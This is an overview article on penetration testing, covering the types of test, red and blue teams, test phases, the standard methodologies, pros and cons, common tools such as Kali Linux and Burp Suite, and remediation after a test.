Penetration tests are simulated cyber attacks executed by white hat hackers on systems and networks. The goal of these simulations is to detect vulnerabilities, misconfigurations, errors, and other weaknesses that real attackers could exploit.
Pentesters work closely with the organization whose security posture they are hired to improve. There are different types of penetration tests, methodologies and best practices that need to be followed for optimal results, and we’ll cover those here.
Table of Contents
Different Methods and Types of Penetration Testing
When a company hires a penetration testing service, it will typically be offered three different types of simulations. Known as black, white, and gray box pentests, these differ in how much information is provided to the pentester before running the simulated attacks. Additionally, tests can be comprehensive or limited. Limited tests can focus on narrower targets such as networks, Internet of Things (IoT) devices, physical security, cloud security, web applications, or other system components.
White box pentest
In white box penetration testing, organizations provide white hat hackers — sometimes called ethical hackers — with all of the information on their systems and simulation targets. The information provided includes source code and user credentials, privileged administrative access, and other critical data, which can be used to simulate an internal attack. Since much of the access information is provided up front, these tests are less expensive than black box tests.
Black box pentest
These are the most time-consuming and costly types of penetration tests. However, they are also the most realistic tests. They come very close to the steps that real attackers go through. In black box tests, also known as blind tests, penetration testers are not given any information. They have to start by mapping the entire infrastructure to find weak entry points and identify where critical business assets are located.
Gray box pentest
In gray box tests, also known as translucent tests, the organization gives some information to the pentesters but does not provide full disclosure of the architecture. The information provided to pentesters is usually an employer’s access credentials or knowledge of internal networks or applications.
Red and blue teams
In all these three types of pentests, security teams and penetration testers engage in what is known as a red-blue team strategy. Pentesters, posing as red teams, may previously inform the blue team, or security team, about the nature of the simulation, or they may not. Red-blue team strategy allows security teams to learn what actual attacks look like and measure their response and performance.
Red and blue team exercises can go beyond individual pentests to include comprehensive, ongoing testing objectives. Their communications can also be facilitated by a third team, called a purple team, for optimal effectiveness.
Also read: Red Team vs Blue Team vs Purple Team: Differences Explained
Comprehensive and limited pentests
Finally, tests can be comprehensive, where organizations test out their entire network, systems, and endpoints, or limited to specific infrastructure components. Extensive tests are rare, expensive, and hard to execute.
Because organizations usually have penetration testing programs that outline and schedule tests periodically, tests tend to be limited to one or a few components. Limited tests allow for a deeper dive into a particular environment, are used for updates and new applications, are more focused, and are cheaper and faster to run.
Depending on what limited tests focus on, they can be:
- Network pentests
- Wireless pentests
- Physical pentests
- Social engineering pentests
- Client-side pentests
- IoT pentests
- Mobile pentests
- Web pentests
- Cloud pentests
- Edge computing pentests
Also read: Penetration Testing vs. Vulnerability Testing: An Important Difference
Starting a Pentesting Program
Most organizations hire outside help to conduct pentesting, but those with larger security teams could start their own internal program, with the added benefit that they may be able to carry out a more comprehensive program as a result.
Either way, it’s best to design your pentesting program internally so that you ensure your goals are met and the most critical assets protected.
For more on pentesting program design and assembling a team, read How to Implement a Penetration Testing Program in 10 Steps.
7 Steps of Penetration Testing
Companies hiring penetration services should also familiarize themselves with the tests’ seven phases. White hat hackers must have intimate knowledge of all steps, including the first and final steps, which are often left out.
The phases of penetration tests are:
- Pre-engagement
- Reconnaissance or open-source intelligence (OSINT) gathering
- Scanning or discovery
- Vulnerability assessment: Gaining access
- Exploitation: Maintaining access
- Post-exploitation, reporting, and risk analysis
- Remediation
Further reading: Penetration Testing Phases & Steps Explained
The Five Different Penetration Testing Methodologies
Leading security organizations have developed five penetration testing methodologies that serve as a blueprint for testing environments. These include:
- Open Web Application Security Project (OWASP)
- National Institute of Standards and Technology (NIST)
- Open-Source Security Testing Methodology Manual (OSSTMM)
- Information System Security Assessment Framework (ISSAF)
- Penetration Testing Execution Standard (PTES)
These methodologies provide clear direction on how pentests are conducted. Methodologies are exhaustive, detailed, and developed for different businesses and organizations. For example, some methods meet national security and federal standards, while others are focused on private companies.
Also read: What Is a Pentest Framework? Top 7 Frameworks Explained
NIST
Developed by NIST, an agency of the United States Department of Commerce, NIST Special Publication 800-115, Technical Guide to Information Security Testing and Assessment is the most specific from start to finish. Companies that want to meet high-security standards adopt this methodology for penetration testing. NIST is also mandatory for several businesses and organizations.
OSSTMM
Developed by the Institute for Security and Open Methodologies (ISECOM), the Open Source Security Testing Methodology Manual (OSSTMM) is the most popular pentest methodology. It is also specific, allowing white hat hackers to customize their tests to an organization’s particular demands. The widely used OSSTMM sets recognized standards for tests, is peer-reviewed, and is based on a scientific approach.
The OSSTMM guide is divided into several main sections and tests:
- Data controls
- Personnel security awareness
- Fraud and social engineering control
- Computer and telecommunications networks
- Wireless devices
- Mobile devices
- Physical security access controls
- Security processes
- Physical locations, including buildings, perimeters, and military bases
ISSAF
The Information Systems Security Assessment Framework (ISSAF), created by the Open Information Systems Security Group (OISSG), is the go-to methodology for pentesters that need to use a lot of tools and must run entirely personalized penetration tests. The downside of ISSAF is that it is no longer updated, and keeping up to date is critical in an ever-evolving cyber threat landscape. Despite this, testers still turn to ISSAF to link different steps of the pentest process with various tools. Like all methodologies, it covers all stages from pretest to reporting.
ISSAF phases include:
- Information gathering
- Network mapping
- Vulnerability identification
- Penetration
- Gaining access and privilege escalation
- Enumerating further
- Compromising remote users and sites
- Maintaining access
- Covering the tracks
OWASP
Developed by OWASP, this methodology is specifically designed for web and mobile applications, IoT devices, and application programming interfaces (APIs). It can not only help penetration testers but is also used in the early stages of app development. Additionally, the methodology is updated and helps the security community stay on top of the latest technologies.
The guide provides comprehensive guidelines for each penetration testing method, with over 66 controls to assess in total. Major areas include:
- Network footprinting (reconnaissance)
- Discovery and probing
- Enumeration
- Password cracking
- Vulnerability assessment
- AS/400 auditing
- Bluetooth-specific testing
- Cisco specific testing
- Citrix-specific testing
- Network backbone
- Server-specific tests
- VoIP (voice over Internet Protocol) security
- Wireless penetration
- Physical security
- Final report
PTES
The PTES framework offers guidance on all stages of a pentest. It consists of seven main sections. These cover everything testers need, including initial communications, intelligence gathering, threat modeling phases, vulnerability research, exploitation, and post-exploitation.
Additionally, because the seven sections and standards do not provide technical guidelines, PTES developed a comprehensive and detailed technical guide.
PCI DSS
And a bonus: The PCI Standards Council has also published pentesting guidance for organizations that come under the PCI DSS standard.
Also Read: Network Protection: How to Secure a Network
Pros and Cons of Penetration Testing
Like all security solutions and approaches, penetration tests have benefits, risks, and challenges. The most significant advantage of penetration testing is that it is the only tool that simulates human-made real attacks. Automated security technology cannot mimic hackers’ techniques in real life. Therefore, penetration testers are vital in providing technical insight into what attackers can do.
Penetration testing’s other benefits include detecting vulnerabilities, errors, and weaknesses. Penetration tests are also flexible and can be customized. This allows organizations to test different scenarios and adapt to modern threats as they are released into the wild. Tests can also reveal the consequences an error or misconfiguration might have.
Automated tools are good at detecting errors, but they typically don’t offer insight into what would happen if an attacker exploits a vulnerability. With pentests, the most expert testers will provide remediation recommendations. This allows organizations not to understand not only where their weak points are, but also how to fix them and take action.
On the other hand, penetration tests also have some drawbacks. Even if you use free tools, pentesting involves the expense of hiring security pros or consultants. And those pros need to clean up when they’re done, removing any backdoors or anything else they may have installed to get a foothold in the network. And of course reporting has to be good to fix the flaws they do find.
The efficiency of the test will depend on the penetration testers and the skills they bring to the table. Another challenge the sector faces is recognizing the importance of penetration tests and getting buy-in. While penetration testing started as a concept back in the 1970s, many organizations are still reluctant to run tests on their systems.
The lack of security culture and awareness of how pentesting has evolved and how effective it can be holds back many decision-makers. Trusting a penetration tester with your system, sensible data, and critical assets for business operations can also be a roadblock, especially because pentesters will simulate real attacks.
Top Pentesting Tools
There are numerous penetration test tools in the market; some are free to use, while others are commercial solutions. Some of the most popular and effective solutions pentesters use include Kali Linux, Burp Suite, Wireshark, and John the Ripper. And while not listed below, other popular penetration testing tools include Hashcat, Nmap, and Invicti.
Kali Linux
Kali Linux is an open-source operating system maintained by Offensive Security that facilitates penetration testing, security forensics, and other activities. Kali Linux is an all-in-one system that includes roughly 600 open source security tools, including the following:
- Nmap: Port scanner
- Wireshark: Packet analyzer
- Metasploit: Penetration testing framework with thousands of exploit modules
- John the Ripper: Password cracker
- Sqlmap: automated SQL injection and database import
- Aircrack-ng: For wireless local area network (LAN) penetration testing
- OWASP ZAP: Web application security scanner
- Burp Suite: Application security testing
Burp Suite
Burp Suite is a suite of application security testing tools developed by PortSwigger with free and paid license options. It also includes the popular Burp Proxy, which allows penetration testers to do man-in-the-middle (MitM) attacks between a web server and a browser. With this solution, pentesters can inspect network traffic to assess exploit vulnerabilities and data leaks in web applications.
With Burp Suite features, users can:
- Test clickjacking attacks
- Assess token strength
- Do deep manual tests
- Record results of automated attacks to adjust future attacks
- Execute fast brute-forcing and fuzzing with custom sequences of HTTP requests containing multiple payload sets
- Construct cross-site request forgery (CSRF) exploits, generate HTML exploits, and demonstrate CSRF attacks
Also read: Getting Started with the Burp Suite: A Pentesting Tutorial
Wireshark
This open-source license solution, available at GitHub, is specially designed for network monitoring. Using Wireshark, penetration testers can automatically read real-time data from different types of networks, such as Ethernet, token ring, loopback, and asynchronous transfer mode (ATM) connections.
Other features include:
- Data encryption
- Compliance management capabilities
- Server monitoring and alerting
- Data import and export
John the Ripper
John the Ripper is a free password-cracking tool that supports 15 operating systems, including 11 from the Unix family, DOS, Win32, BeOS, and OpenVMS.
The tools can be customized, with features including:
- Auto-detection of password hash types
- Support for encrypted password formats like Unix crypt hashes, Kerberos AFS tokens, and Windows LAN Manager hashes
- Ability to crack password encryption based on DES, MD5, Blowfish, and MD4
- Support for password hashes and passwords stored in databases and directory systems such as LDAP and MySQL
For more on the wide array of available pentesting tools, see the Best Penetration Testing Tools and the Top Open Source Penetration Testing Tools.
What to Do After a Penetration Test
Penetration tests do not end after white hat hackers detect vulnerabilities. Reporting and remediation are vital components that should never be left out. Top pentest vendors offer complete reports that provide a 360-degree view into the errors, the consequences, and recommendations to fix and patch security flaws.
Reporting also serves the security teams, IT, developers, workers, and top decision-makers. The entire work of the organization and its performance should be enhanced through reporting. The main goal of penetration tests is not to detect weakness but to improve efficiency and security and better prevent risks.
In addition, a good practice for penetration testers and organizations is to restore systems to the original state in which they were before an attack. If pentesters modify configurations and settings, install software, or make any other alterations to the system, they must clean and restore it.
Additionally, companies running penetration tests should be executing them within their pentest program and frameworks. After remediation, the pentest teams should monitor the security upgrades and patches and prepare to run the next scheduled test. Penetration testing is not a one-and-done process; it’s continual work.
For more on finding and fixing vulnerabilities, see:
- Top Vulnerability Management Tools
- Best Patch Management Software & Tools
- Vulnerability Management as a Service (VMaaS): Ultimate Guide
Bottom Line: Penetration Testing
Penetration testing is a critically important cybersecurity practice that can find security holes before hackers do. Along with threat hunting, it’s a practice that can’t be done by tools alone; it requires a human element. And those people need to be trained and prepared to do the job right. It’s not an easy undertaking, but it’s one that every organization should do to the best extent possible.
To see pentest tools in action, read Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR.